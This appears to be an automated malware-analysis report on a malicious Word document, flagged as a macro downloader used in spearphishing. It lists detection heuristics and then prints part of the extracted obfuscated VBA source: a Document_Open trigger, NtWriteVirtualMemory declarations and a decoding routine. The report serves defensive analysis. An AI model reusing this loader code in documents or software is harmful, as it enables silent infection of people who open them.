MALICIOUS
Risk Score: 122

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment

The sample was identified as malicious by ClamAV with the signature Doc.Downloader.Macro-6539595-0, indicating it is a macro-based downloader. The presence of a Document_Open macro and VBA code confirms the use of Visual Basic for execution. The script's intent is to download and execute a second-stage payload, typical of a spearphishing attachment.

Heuristics (4)
- ClamAV: Doc.Downloader.Macro-6539595-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (In document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (In document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (In document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (In document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (In document text, OLE body)

Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12939 bytes |

SHA-256: 155346220b11b1ff787758a62e780333c0a22389a964e54021d4c918fbfa3e18

Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
nuts.scribbling
referenced = 48 + 6
Pmt 0, referenced, 26534, 27963, 3
End Sub
Attribute VB_Name = "government"
Attribute VB_Base = "0{3587F659-687C-428C-9384-620A43CBBA3A}{5ABCE747-6263-44D6-96A1-40BB55FCC989}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "bobs"
#If (115 - 7 + 292 + 14 - 71 + 357) > ((64 - 5 + 261) - (30 - 25 + 535) * 1) And Not ((121 - 18 - 75) - (36 - 115 + 107)) * 2 < (Win64) Then
Public Declare Function invalidity _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal sag As Any, ByVal casket As Any, ByVal abyss As Any, ByVal hierarchical As Any, ByVal actinomyxidian As Any) As Long
Public Declare Function nonmetal _
Lib "ntdll " Alias _
"AcquireSRWLockShared" (validated As Any) As Long
#End If
#If (112 - 119 + 407 + 74 - 58 + 284) > ((75 - 64 + 309) - (97 - 91 + 534) * 1) And ((40 - 25 + 13) - (78 - 14 - 36)) * 2 < (Win64) Then
Public Declare PtrSafe Function fish _
Lib "Shlwapi " Alias _
"GetOverlappedResult" (ByVal gawain As Any, canaliculate As Any, quaestio As Any, putter As Any) As LongPtr
Public Declare PtrSafe Function invalidity _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal anthropomancy As Any, ByVal highprincipled As Any, ByVal audiology As Any, ByVal syllabically As Any, ByVal copulationsex As Any) As LongPtr
#End If
Function mekong(birththroe, kilt, accipitrine)
Dim eelpout As Integer
Dim radiation As Byte
Dim pigeonhole As LongPtr
Dim coralwood As LongPtr
Dim nihilist As LongPtr
Dim graphotype As Byte
Dim displant As LongPtr
Dim musa As LongPtr
ataraxia = ataraxia * 4
osteomalacia = "babylon"
coralwood = birththroe
musa = accipitrine
angas = Rnd(271)
displant = kilt
tombigbee = 59 + 20
Pmt 0, tombigbee, 23203, 49597, 4
osteomalacia = osteomalacia
pigeonhole = 62 - 99 + 36
invalidity ByVal pigeonhole, _
coralwood, _
displant, musa, _
nihilist
wittol = Rnd(200)
End Function
Sub pageNumber()
ActiveDocument.Sections(ActiveDocument.Sections.Count) _
.Headers(wdHeaderFooterPrimary).Range.Select
With Selection
.Paragraphs(1).Alignment = wdAlignParagraphCenter
.TypeText Text:="Page "
.Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _
"PAGE ", PreserveFormatting:=True
.TypeText Text:=" of "
.Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _
"NUMPAGES ", PreserveFormatting:=True
End With
End Sub
End Sub
Function patera(akimbo, praya, nonproduction)
If nonproduction = 34 + (10 / 2 - 5) Then
patera = akimbo \ praya
ElseIf nonproduction = 44 + (5 - 3) / 2 - 1 Then
patera = akimbo And praya
ElseIf nonproduction = 52 + (56 / 7 - 4 * 2) Then
patera = akimbo * praya
End If
End Function
Attribute VB_Name = "jecur"
Function pickelhaube()
Dim hemostat(255) As Byte
disorder = 68 - 96 + 93
For i = disorder To (113 - 74 + 52)
hemostat(disorder) = disorder - (27 - 75 + 113)
disorder = disorder + 1
If (45 - 44 + 90) < disorder Then Exit For
Next
disorder = (38 - 25 + 35)
For i = disorder To (73 - 50 + 35)
hemostat(disorder) = disorder + (18 - 5 - 9)
disorder = disorder + 1
If (52 - 116 + 122) < disorder Then Exit For
Next
disorder = (50 - 62 + 109)
For i = disorder To (97 - 59 + 85)
hemostat(disorder) = disorder - (96 - 73 + 48)
disorder = disorder + 1
If (87 - 106 + 142) < disorder Then Exit For
Next
hemostat(121 - 127 + 53) = (98 - 115 + 80)
disorder = (23 - 87 + 107)
hemostat(disorder) = (71 - 39 + 30)
pickelhaube = hemostat
End Function
Function unstained(deviltry) As String
Dim araroba(63) As Long
Dim smugness() As Byte
Dim leaden As Long
Dim misjudgent(
```

... (truncated)